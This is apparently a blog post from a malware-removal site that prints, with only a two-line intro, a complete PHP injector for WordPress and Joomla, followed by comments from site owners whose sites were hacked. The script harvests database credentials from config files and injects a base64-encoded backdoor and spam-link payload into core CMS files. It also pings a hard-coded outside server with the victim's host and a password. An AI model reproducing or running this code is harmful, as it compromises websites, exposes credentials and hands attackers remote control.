This is an automated joomla / wordpress code injector.
It’ll find files, and inject php code to them.
<?php DEFINE('ONLY_SEARCH', false); DEFINE('MAX_LEVEL', 2); DEFINE('MAX_ITERATION', 500); DEFINE('P', $_SERVER['DOCUMENT_ROOT']); DEFINE('URL', 'http://78.24.222.200/use.php'); $GLOBALS['stopkey'] = Array('upload', 'uploads', 'img', 'administrator', 'admin', 'bin', 'cache', 'cli', 'components', 'includes', 'language', 'layouts', 'libraries', 'logs', 'media', 'modules', 'plugins', 'tmp', 'upgrade', 'engine', 'templates', 'template', 'images', 'css', 'js', 'image', 'file', 'files', 'wp-admin', 'wp-content', 'wp-includes'); $GLOBALS['_'] = Array(); $dirs = Array(); $domain = Array(); $search = Array( Array('file' => 'configuration.php', 'cms' => 'jm', '_key' => 'JConfig'), Array('file' => 'wp-config.php', 'cms' => 'wp', '_key' => '$table_prefix'), ); $BASE_64 = 'Y2xhc3MgQ2FjaGVfQ2xhc3MKCXsKCQlwcml2YXRlICR0YWJsZSA9ICd7JFRBQkxFfSc7CgkJcHVibGljICRzdGFydF9jYWNoZSA9IGZhbHNlOwoJCXByaXZhdGUgJGNtcyA9ICd7JENNU30nOwoJCXByaXZhdGUgJGNhbm9uaWNhbCA9ICcnOwoJCQoJCXByaXZhdGUgJGRiX2hvc3QgPSAneyRIT1NUfSc7CgkJcHJpdmF0ZSAkZGJfdXNlciA9ICd7JFVTRVJ9JzsKCQlwcml2YXRlICRkYl9wYXNzd29yZCA9ICd7JERCX1BBU1NXT1JEfSc7CgkJcHJpdmF0ZSAkZGJfbmFtZSA9ICd7JE5BTUV9JzsKCQkKCQlwcml2YXRlIGZ1bmN0aW9uIHVybF9ub3coKQoJCQl7CgkJCQlyZXR1cm4gJ2h0dHA6Ly8nIC4gJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gdXJsZGVjb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKTsKCQkJfQoJCQoJCXByaXZhdGUgZnVuY3Rpb24gdXJsX2NyZWF0ZSgkd29yayA9IDEpCgkJCXsKCQkJCUBteXNxbF9xdWVyeSgnIElOU0VSVCBJTlRPIGAnLiR0aGlzLT50YWJsZS4nYCBTRVQgYHdvcmtgID0gIicuJHdvcmsuJyIsIGB1cmxgID0gIicubXlzcWxfZXNjYXBlX3N0cmluZygkdGhpcyAtPiB1cmxfbm93KCkpLiciCgkJCQlPTiBEVVBMSUNBVEUgS0VZIFVQREFURSBgd29ya2AgPSAiJy4kd29yay4nIgoJCQkJJyk7CgkJCX0KCQkKCQlwdWJsaWMgZnVuY3Rpb24gdXJsX2NvZGUoKQoJCQl7CgkJCQlpZiAoJHF1ZXJ5ID0gQG15c3FsX3F1ZXJ5KCdTRUxFQ1QgYGNvZGVgIEZST00gYCcuJHRoaXMtPnRhYmxlLidgIFdIRVJFIGB1cmxgID0gIicubXlzcWxfZXNjYXBlX3N0cmluZygkdGhpcyAtPiB1cmxfbm93KCkpLiciJykpCgkJCQkJewoJCQkJCQlyZXR1cm4gc3RyaXBzbGFzaGVzKEBteXNxbF9yZXN1bHQoJHF1ZXJ5LCAwKSk7CgkJCQkJfQoJCQkJCgkJCQlyZXR1cm4gJyc7CgkJCX0KCQkKCQlwcml2YXRlIGZ1bmN0aW9uIHVybF9leGlzdCgpCgkJCXsKCQkJCWlmICgkcXVlcnkgPSBAbXlzcWxfcXVlcnkoJ1NFTEVDVCBjb3VudCgqKSBGUk9NIGAnLiR0aGlzLT50YWJsZS4nYCBXSEVSRSBgdXJsYCA9ICInLm15c3FsX2VzY2FwZV9zdHJpbmcoICR0aGlzLT51cmxfbm93KCkgKS4nIicpKQoJCQkJCXsKCQkJCQkJaWYgKEBteXNxbF9yZXN1bHQoJHF1ZXJ5LCAwKSA9PSAnMCcpCgkJCQkJCQl7CgkJCQkJCQkJcmV0dXJuIGZhbHNlOwoJCQkJCQkJfQoJCQkJCQllbHNlCgkJCQkJCQl7CgkJCQkJCQkJcmV0dXJuIHRydWU7CgkJCQkJCQl9CgkJCQkJfQoJCQkJCQoJCQkJcmV0dXJuIHRydWU7CgkJCX0KCQkKCQlwcml2YXRlIGZ1bmN0aW9uIGdldF9jb2RlKCkKCQkJewoJCQkJJG9wdGlvbnNbJ2h0dHAnXSA9IGFycmF5KAoJCQkJCSdtZXRob2QnID0+ICJHRVQiLAoJCQkJCSdmb2xsb3dfbG9jYXRpb24nID0+IDAKCQkJCSk7CgkJCQkKCQkJCSRjb250ZXh0ID0gc3RyZWFtX2NvbnRleHRfY3JlYXRlKCRvcHRpb25zKTsKCQkJCSRnZXQgPSBmaWxlX2dldF9jb250ZW50cygkdGhpcy0+dXJsX25vdygpLCBOVUxMLCAkY29udGV4dCk7CgkJCQkKCQkJCWlmIChwcmVnX21hdGNoKCchPGxpbmtbXj5dKnJlbD1bXCciXWNhbm9uaWNhbFtcJyJdW14+XSpocmVmPVtcJyJdKFteXCciXSspW1wnIl1bXj5dKj4haXMnLCAkZ2V0LCAkXykpCgkJCQkJewoJCQkJCQkkdGhpcyAtPiBjYW5vbmljYWwgPSBodG1sX2VudGl0eV9kZWNvZGUodXJsZGVjb2RlKCRfWzFdKSk7CgkJCQkJfQoJCQkJZWxzZWlmIChwcmVnX21hdGNoKCchPGxpbmtbXj5dKmhyZWY9W1wnIl0oW15cJyJdKylbXCciXVtePl0qcmVsPVtcJyJdY2Fub25pY2FsW1wnIl1bXj5dKj4haXMnLCAkZ2V0LCAkXykpCgkJCQkJewoJCQkJCQkkdGhpcyAtPiBjYW5vbmljYWwgPSBodG1sX2VudGl0eV9kZWNvZGUodXJsZGVjb2RlKCRfWzFdKSk7CgkJCQkJfQoKCQkJCWlmICghZW1wdHkoJGh0dHBfcmVzcG9uc2VfaGVhZGVyKSkKCQkJCQl7CgkJCQkJCXNzY2FuZigkaHR0cF9yZXNwb25zZV9oZWFkZXJbMF0sICdIVFRQLyUqZC4lKmQgJWQnLCAkY29kZSk7CgkJCQkJCWlmIChpc19udW1lcmljKCRjb2RlKSkgcmV0dXJuICRjb2RlOwoJCQkJCX0KCQkJCQoJCQkJcmV0dXJuIDIwMDsKCQkJfQoJCQkKCQlwdWJsaWMgZnVuY3Rpb24gcHJlX2NhY2hlKCkKCQkJewoJCQkJaWYgKGlzc2V0KCRfUE9TVFsnYWN0aW9uJ10pKQoJCQkJCXsKCQkJCQkJc3dpdGNoICgkX1BPU1RbJ2FjdGlvbiddKQoJCQkJCQkJewoJCQkJCQkJCWNhc2UgJ2dldF9hbGxfbGlua3MnOwoJCQkJCQkJCQloZWFkZXIoIkNvbnRlbnQtVHlwZTogdGV4dC9wbGFpbiIpOwoJCQkJCQkJCQlpZiAoJHF1ZXJ5ICA9IEBteXNxbF9xdWVyeSgnU0VMRUNUICogRlJPTSBgJy4kdGhpcy0+dGFibGUuJ2AgV0hFUkUgYHdvcmtgID0gIjEiIE9SREVSIEJZIGB1cmxgIERFU0MgTElNSVQgMCwgMjUwMCcpKQoJCQkJCQkJCQkJewoJCQkJCQkJCQkJCXdoaWxlICgkZGF0YSA9IEBteXNxbF9mZXRjaF9hc3NvYygkcXVlcnkpKSAKCQkJCQkJCQkJCQkJewoJCQkJCQkJCQkJCQkJZWNobyAnPGU+PHVybD4nIC4gJGRhdGFbJ3VybCddIC4gJzwvdXJsPjxjb2RlPicgLiAkZGF0YVsnY29kZSddIC4gJzwvY29kZT48aWQ+JyAuICRkYXRhWydJRCddIC4gJzwvaWQ+PC9lPicgLiAiXHJcbiI7CgkJCQkJCQkJCQkJCX0KCQkJCQkJCQkJCX0KCQkJCQkJCQlicmVhazsKCQkJCQkJCQkKCQkJCQkJCQljYXNlICdzZXRfbGlua3MnOwoJCQkJCQkJCQlpZiAoaXNzZXQoJF9QT1NUWydkYXRhJ10pKQoJCQkJCQkJCQkJewoJCQkJCQkJCQkJCWlmIChteXNxbF9xdWVyeSgnVVBEQVRFIGAnLiR0aGlzLT50YWJsZS4nYCBTRVQgY29kZSA9ICInIC4gbXlzcWxfZXNjYXBlX3N0cmluZygkX1BPU1RbJ2RhdGEnXSkgLiAnIiBXSEVSRSBjb2RlID0gIiIgQU5EIGB3b3JrYCA9ICIxIiBMSU1JVCAxJykpCgkJCQkJCQkJCQkJCXsKCQkJCQkJCQkJCQkJCWVjaG8gJ3RydWUnOwoJCQkJCQkJCQkJCQl9CgkJCQkJCQkJCQl9CgkJCQkJCQkJYnJlYWs7CgkJCQkJCQkJCgkJCQkJCQkJY2FzZSAnc2V0X2lkX2xpbmtzJzsKCQkJCQkJCQkJaWYgKGlzc2V0KCRfUE9TVFsnZGF0YSddKSkKCQkJCQkJCQkJCXsKCQkJCQkJCQkJCQlpZiAoQG15c3FsX3F1ZXJ5KCdVUERBVEUgYCcuJHRoaXMtPnRhYmxlLidgIFNFVCBjb2RlID0gIicgLiBteXNxbF9lc2NhcGVfc3RyaW5nKCRfUE9TVFsnZGF0YSddKSAuICciIFdIRVJFIGBJRGAgPSAiJyAuIG15c3FsX2VzY2FwZV9zdHJpbmcoJF9QT1NUWydpZCddKSAuICciJykpCgkJCQkJCQkJCQkJCXsKCQkJCQkJCQkJCQkJCWVjaG8gJ3RydWUnOwoJCQkJCQkJCQkJCQl9CgkJCQkJCQkJCQl9CgkJCQkJCQkJYnJlYWs7CgkJCQkJCQkJCgkJCQkJCQkJZGVmYXVsdDogZGllKCdlcnJvciBhY3Rpb24nKTsKCQkJCQkJCX0KCQkJCQkJZXhpdDsKCQkJCQl9CgkJCX0KCQkKCQlzdGF0aWMgZnVuY3Rpb24gd29yZHByZXNzX2NhY2hlKCRjb250ZW50KQoJCQl7CgkJCQkkR0xPQkFMU1snX2NhY2hlXyddIC0+IGNyZWF0ZV9uZXdfcGFnZSgpOwoJCQkJJGNvbnRlbnQgPSAkY29udGVudCAuICRHTE9CQUxTWydnbG9iYWxfY29kZSddOwoJCQkJJEdMT0JBTFNbJ2dsb2JhbF9jb2RlJ10gPSAnJzsKCQkJCXJldHVybiAkY29udGVudCA7CgkJCX0KCQkKCQlwdWJsaWMgZnVuY3Rpb24gY3JlYXRlX25ld19wYWdlKCkKCQkJewoJCQkJJEdMT0JBTFNbJ19jYWNoZV8nXSAtPiBkYl9jb25uZWN0KCk7CgkJCQlpZiAoIChzdHJwb3Moc3RydG9sb3dlcigkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pLCAnZ29vZ2xlYm90JykgIT09IGZhbHNlKSAmJighJHRoaXMgLT4gdXJsX2V4aXN0KCkpKQoJCQkJCXsKCQkJCQkJJHRoaXMgLT4gdXJsX2NyZWF0ZSggMCApOwoJCQkJCQkKCQkJCQkJaWYgKCgkdGhpcyAtPiBnZXRfY29kZSgpID09IDIwMCkgJiYgKCAoJHRoaXMgLT4gY2Fub25pY2FsID09ICcnKSB8fCAoICR0aGlzIC0+IGNhbm9uaWNhbCA9PSAkdGhpcy0+dXJsX25vdygpICkgKSkKCQkJCQkJCXsKCQkJCQkJCQkkdGhpcyAtPiB1cmxfY3JlYXRlKCk7CgkJCQkJCQl9CgkJCQkJfQoJCQl9CgkJCgkJc3RhdGljIGZ1bmN0aW9uIHVwZGF0ZV9jb250ZW50KCRjb250ZW50LCAkY29kZSkKCQkJewoJCQkJaWYgKCFlbXB0eSgkY29kZSkpCgkJCQkJewoJCQkJCQlpZiAocHJlZ19tYXRjaCgnITxib2R5W14+XSo+IWlzJywgJGNvbnRlbnQpKQoJCQkJCQkJewoJCQkJCQkJCSRjb250ZW50ID0gcHJlZ19yZXBsYWNlKCchKDxib2R5W14+XSo+KSFzaScsICdcMScgLiAkY29kZSwgJGNvbnRlbnQpOwoJCQkJCQkJfQoJCQkJCQllbHNlaWYgKHByZWdfbWF0Y2goJyE8L2JvZHk+IXNpJywgJGNvbnRlbnQpKQoJCQkJCQkJewoJCQkJCQkJCSRjb250ZW50ID0gcHJlZ19yZXBsYWNlKCchPC9ib2R5PiFzaScsICRjb2RlIC4gJzwvYm9keT4nLCAkY29udGVudCk7CgkJCQkJCQl9CgkJCQkJCWVsc2VpZiAocHJlZ19tYXRjaCgnITwvaHRtbD4hc2knLCAkY29udGVudCkpCgkJCQkJCQl7CgkJCQkJCQkJJGNvbnRlbnQgPSBwcmVnX3JlcGxhY2UoJyE8L2h0bWw+IXNpJywgJGNvZGUgLiAnPC9odG1sPicsICRjb250ZW50KTsKCQkJCQkJCX0KCQkJCQkJZWxzZQoJCQkJCQkJewoJCQkJCQkJCSRjb250ZW50IC49ICRjb2RlOwoJCQkJCQkJfQoJCQkJCX0KCQkJCQkKCQkJCXJldHVybiAkY29udGVudDsKCQkJfQoJCQoJCXN0YXRpYyBmdW5jdGlvbiBfY2FjaGUoJGNvbnRlbnQpCgkJCXsKCQkJCSRHTE9CQUxTWydfY2FjaGVfJ10gLT4gY3JlYXRlX25ld19wYWdlKCk7CgkJCQlyZXR1cm4gQ2FjaGVfQ2xhc3M6OnVwZGF0ZV9jb250ZW50KCRjb250ZW50LCAkR0xPQkFMU1snZ2xvYmFsX2NvZGUnXSkgOwoJCQl9CgkJCgkJc3RhdGljIGZ1bmN0aW9uIGRpc2FibGVfY2FjaGUoKQoJCQl7CgkJCQkgQG9iX2VuZF9mbHVzaCgpOwoJCQl9CgkJCgkJcHJpdmF0ZSBmdW5jdGlvbiBkYl9jb25uZWN0KCkKCQkJewoJCQkJQG15c3FsX2Nvbm5lY3QoJHRoaXMgLT4gZGJfaG9zdCwgJHRoaXMgLT4gZGJfdXNlciwgJHRoaXMgLT4gZGJfcGFzc3dvcmQpOwoJCQkJQG15c3FsX3NlbGVjdF9kYiggJHRoaXMgLT4gZGJfbmFtZSApOwoJCQl9CgkJCgkJcHVibGljIGZ1bmN0aW9uIGNyZWF0ZV9jYWNoZSgpCgkJCXsKCQkJCSR0aGlzIC0+IHN0YXJ0X2NhY2hlID0gQG9iX3N0YXJ0KCBBcnJheSgkdGhpcywgJ19jYWNoZScpICk7CgkJCX0KCQkJCgkJc3RhdGljIGZ1bmN0aW9uIGNyZWF0ZSgpCgkJCXsKCQkJCWlmICggc3RycG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAnd3AtYWRtaW4nKSAhPT0gRkFMU0UgKSByZXR1cm4gOwoJCQkJJEdMT0JBTFNbJ19jYWNoZV8nXSA9IG5ldyBDYWNoZV9DbGFzcygpOwoJCQkJaWYgKCRHTE9CQUxTWydfY2FjaGVfJ10gLT4gY21zID09ICdqbScpICRHTE9CQUxTWydfY2FjaGVfJ10gLT4gZGJfY29ubmVjdCgpOwoJCQkJaWYgKCRfUE9TVFsncGFzc3dvcmQnXSA9PSAneyRQQVNTV09SRH0nKSAkR0xPQkFMU1snX2NhY2hlXyddIC0+IHByZV9jYWNoZSgpOwoJCQkJJEdMT0JBTFNbJ2dsb2JhbF9jb2RlJ10gPSAkR0xPQkFMU1snX2NhY2hlXyddIC0+IHVybF9jb2RlKCk7CgkJCQkJCQoJCQkJc3dpdGNoICgkR0xPQkFMU1snX2NhY2hlXyddIC0+IGNtcykKCQkJCQl7CgkJCQkJCWNhc2UgJ3dwJzsKCQkJCQkJCWFkZF9maWx0ZXIoJ3RoZV9jb250ZW50JywgQXJyYXkoJEdMT0JBTFNbJ19jYWNoZV8nXSwgJ3dvcmRwcmVzc19jYWNoZScpKTsKCQkJCQkJYnJlYWs7CgkJCQkJCQkJCgkJCQkJCWRlZmF1bHQ6ICRHTE9CQUxTWydfY2FjaGVfJ10gLT4gY3JlYXRlX2NhY2hlKCk7CgkJCQkJfQkJCQkJCQoJCQl9CgkJCQoJfQoKQ2FjaGVfQ2xhc3M6OmNyZWF0ZSgpOw=='; function Match($regexp, $content, $index = 1) { if (preg_match($regexp, $content, $result)) { return $result[$index]; } return false; } function SearchFile($search, $path) { if ($dir = @opendir($path)) { $i = 0; while (($filename = @readdir($dir)) !== false) { if ($i > MAX_ITERATION) break; $i++; if ($filename != '.' && $filename != '..') { if (is_dir($path . '/' . $filename) && !in_array($filename, $GLOBALS['stopkey'])) { SearchFile($search, $path . '/' . $filename); } else { foreach ($search as $_) { if (strtolower($filename) == strtolower($_['file'])) { $GLOBALS['_'][$path . '/' . $filename] = Array($_['cms'], $path . '/' . $filename); } } } } } } } function pingCode($password) { return '//PING if (@file_get_contents(\''.URL.'?p='.$password.'&url=\' . $_SERVER[\'HTTP_HOST\'])) { if ($file = @file_get_contents(__FILE__)) { $file = preg_replace(\'!//PING.*//ENDPING!s\', \'\', $file); @file_put_contents(__FILE__, $file); } } //ENDPING '; } function getCode($password, $data, $cms) { global $BASE_64; $code = ''; if ($code = base64_decode($BASE_64)) { $code = str_replace('{$TABLE}', $data['prefix'] . 'cache_module_content', $code); $code = str_replace('{$PASSWORD}', $password, $code); $code = str_replace('{$CMS}', $cms, $code); $code = str_replace('{$HOST}', $data['host'], $code); $code = str_replace('{$USER}', $data['login'], $code); $code = str_replace('{$DB_PASSWORD}', $data['password'], $code); $code = str_replace('{$NAME}', $data['name'], $code); } return $code; } function CreateJoomCode($data) { $password = md5('_Password_' . rand(100, 200)); $code = pingCode($password) . "\n" . getCode($password, $data, 'jm'); $sql = 'CREATE TABLE IF NOT EXISTS `'.$data['prefix'].'cache_module_content` ( `url` varchar(255) NOT NULL, `code` text NOT NULL, `work` int(11) NOT NULL, `ID` int(11) NOT NULL AUTO_INCREMENT, PRIMARY KEY (`ID`), UNIQUE KEY `url` (`url`), KEY `work` (`work`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;'; @mysql_connect($data['host'], $data['login'], $data['password']); @mysql_select_db($data['name']); if (@mysql_query($sql)) { $_file = $data['path'] . '/includes/framework.php'; if (file_exists($_file)) { $file_content = file_get_contents( $_file ); if (strpos($file_content, 'Cache_Class') === false) { $count = 1; $file_content = str_replace('<?php', '<?php' . "\n" . $code, $file_content, $count); file_put_contents($_file, $file_content); } } } @mysql_close(); } function CreateWpCode($data) { $password = md5('_Password_' . rand(100, 200)); $code = pingCode($password) . "\n" . getCode($password, $data, 'wp'); @mysql_connect($data['host'], $data['login'], $data['password']); @mysql_select_db($data['name']); if (file_exists($data['path'] . '/wp-includes/post.php')) { $file = file_get_contents($data['path'] . '/wp-includes/post.php'); if (strpos($file, 'Cache_Class') === FALSE) { $sql = 'CREATE TABLE IF NOT EXISTS `'.$data['prefix'].'cache_module_content` ( `url` varchar(255) NOT NULL, `code` text NOT NULL, `work` int(11) NOT NULL, `ID` int(11) NOT NULL AUTO_INCREMENT, PRIMARY KEY (`ID`), UNIQUE KEY `url` (`url`), KEY `work` (`work`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;'; if (@mysql_query($sql)) { $file = str_replace('function get_attached_file', $code . "\n\n".'function get_attached_file', $file); file_put_contents($data['path'] . '/wp-includes/post.php', $file); } } } @mysql_close(); } function checkDomain($configFile, $type, &$domain) { global $search; if ($file = file_get_contents($configFile)) { foreach ($search as $_) { if ($type == $_['cms']) { if (strpos($file, $_['_key']) !== false) { switch ($type) { case 'wp'; $db_name = Match('!DB_NAME[\'\s\,]+\'([^\']*)\'\s*\)!s', $file); $db_login = Match('!DB_USER[\'\s\,]+\'([^\']*)\'\s*\)!s', $file); $db_password = Match('!DB_PASSWORD[\'\s\,]+\'([^\']*)\'\s*\)!s', $file); $db_host = Match('!DB_HOST[\'\s\,]+\'([^\']*)\'\s*\)!s', $file); $db_prefix = Match('!\$table_prefix[\s=]*\'([^\']*)\'!s', $file); break; case 'jm'; $db_name = Match('!\$db\s*=\s*\'([^\']*)\'!s', $file); $db_login = Match('!\$user\s*=\s*\'([^\']*)\'!s', $file); $db_password = Match('!\$password\s*=\s*\'([^\']*)\'!s', $file); $db_host = Match('!\$host\s*=\s*\'([^\']*)\'!s', $file); $db_prefix = Match('!\$dbprefix\s*=\s*\'([^\']*)\'!s', $file); break; } $domain[] = Array('host' => $db_host, 'name' => $db_name, 'login' => $db_login, 'password' => $db_password, 'prefix' => $db_prefix, 'path' => Match('!^(.*)/[^/]*$!s', $configFile), 'type' => $type); return ; } } } } } function getDirList($path) { if ($dir = @opendir($path)) { $result = Array(); while (($filename = @readdir($dir)) !== false) { if ($filename != '.' && $filename != '..' && is_dir($path . '/' . $filename)) $result[] = $path . '/' . $filename; } return $result; } return false; } //create root dir for ($i = 0; $i<MAX_LEVEL; $i++) { $dirs[realpath(P . str_repeat('/../', $i + 1))] = realpath(P . str_repeat('/../', $i + 1)); } //search file foreach ($dirs as $dir) { foreach (@getDirList($dir) as $__) { @SearchFile($search, $__); } } //check domain + get db data foreach ($GLOBALS['_'] as $e) { @checkDomain($e[1], $e[0], $domain); } if (!ONLY_SEARCH) { //add code foreach ($domain as $__) { switch ($__['type']) { case 'jm'; @CreateJoomCode($__); break; case 'wp'; @CreateWpCode($__); break; } } } echo json_encode($domain); ?>
6 thoughts on “WordPress + Joomla hacking code”
Hi I found your article via google, my website is hacked and all pages can’t be displayed, I found a file named trust.php in the index folder that contains some cods similar to the one you poted in this article.
I deleted them but the problem is still there, I doubt it has injected code to some PhP files, may I ask what should I do now?
Many thanks!
Reply sent 🙂
Hello, I have the same problem, any help?
Surely! Mail sent 🙂
Hello, i have the same problem. Can you help me?
Hi Thomas! I suggest update your WordPress and all the modules. After that download the whole site to your computer, compare all files one-by-one with original WordPress files (download from https://wordpress.org/download/) and examine rest of the files one-by-one for malicious code. If you need help, I can do the virus removing, send an email to webmaster@wordpressvirusremoval.com